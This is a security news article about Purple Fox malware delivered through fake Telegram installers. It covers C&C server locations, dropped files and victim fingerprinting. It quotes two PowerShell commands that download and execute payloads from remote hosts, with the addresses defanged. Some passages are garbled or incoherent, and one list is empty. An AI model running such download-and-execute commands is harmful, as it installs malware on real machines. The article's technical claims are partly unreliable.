Thursday, April 18, 2024

Malicious Telegram Messenger App Using New Purple Fox Malware to Hack PCs

The cybersecurity experts at Trend Micro have found a very suspicious activity of Purple Fox operators. This Purple Fox malware installs further malicious payloads on all the devices that are already infected or compromised.

The threat actors have noticed that the attacks generally take advantage of legitimate software for implementing malicious payloads. The vulnerability has been named CVE-2021-1732, and this vulnerability generally optimizes rootkit capabilities that are leveraged in their attacks.

Capabilities & Technical Analysis

In this attack, the threat actors have implemented some commands such as:-

  • “cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘hxxp[[:]]//[[:]]17881/57BC9B7E.Png’);MsiMake hxxp[[:]]//[[:]]17881/0CFA042F.Png”
  • “cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http[:]//[:]13405/57BC9B7E.Png’);MsiMake http[:]//[:]13405/0CFA042F.Png”

However, this kind of command helps the threat actor to download some malicious payloads in the affected devices that have been hosted on several compromised servers. 

The PurpleFox servers have been founded on some locations that we have mentioned below:-

  • China – 345
  • India – 34
  • Brazil – 29
  • The United States – 26
  • Others – 113

Targeted vulnerabilities

The vulnerabilities that are targeted or exploited:-

Files dropped

The cybersecurity experts have found some files that have been dropped onto the infected system:

  • Calldriver.exe
  • Driver.sys
  • dll.dll
  • kill.bat
  • speedmem2.hg 

Second & Third Exchange (Victim to C&C)

However, in the second key exchange, it has been noted that the messages are sent from the severe to the infected device of the client, and all of these were handled on the onReceive function.

In the third exchange, once the encrypted session is designated over the WebSocket, now the users have to put their fingerprint on the machine.

And all of this is done by extracting some definite information such as:-

  • Machine name
  • Local IP
  • MCA address
  • Windows version

This type of attack is quite hazardous and has a lot of impact on the infected device. After investigating the whole attack, the cybersecurity detected a large number of malicious installers that kept delivering the same Purple Fox rootkit version.

And threat actors do this by using a similar attack chain, and not only that even they also deliver emails through email; on the other side, there are some that have been suspected to be downloaded from phishing websites. 

So, as a recommendation, the client must stay alerted by this kind of attack as it puta a huge impact on the affected devices.

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity and hacking news updates.


Latest articles

Xiid SealedTunnel: Unfazed by Yet Another Critical Firewall Vulnerability (CVE-2024-3400)

In the wake of the recent disclosure of a critical vulnerability (CVE-2024-3400) affecting a...

Cerber Linux Ransomware Exploits Atlassian Servers to Take Full Control

Security researchers at Cado Security Labs have uncovered a new variant of the Cerber...

FGVulDet – New Vulnerability Detector to Analyze Source Code

Detecting source code vulnerabilities aims to protect software systems from attacks by identifying inherent...

North Korean Hackers Abuse DMARC To Legitimize Their Emails

DMARC is targeted by hackers as this serves to act as a preventative measure...

L00KUPRU Ransomware Attackers discovered in the wild

A new variant of the Xorist ransomware, dubbed L00KUPRU, has been discovered in the...

Oracle Releases Biggest Security Update in 2024 – 372 Vulnerabilities Are Fixed – Update Now!

Oracle has released its April 2024 Critical Patch Update (CPU), addressing 372 security vulnerabilities...

Outlook Login Panel Themed Phishing Attack Evaded All Antivirus Detections

Cybersecurity researchers have uncovered a new phishing attack that has bypassed all antivirus detections.The...
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.


Mastering WAAP/WAF ROI Analysis

As the importance of compliance and safeguarding critical websites and APIs grows, Web Application and API Protection (WAAP) solutions play an integral role.
Key takeaways include:

  • Pricing models
  • Cost Estimation
  • ROI Calculation

Related Articles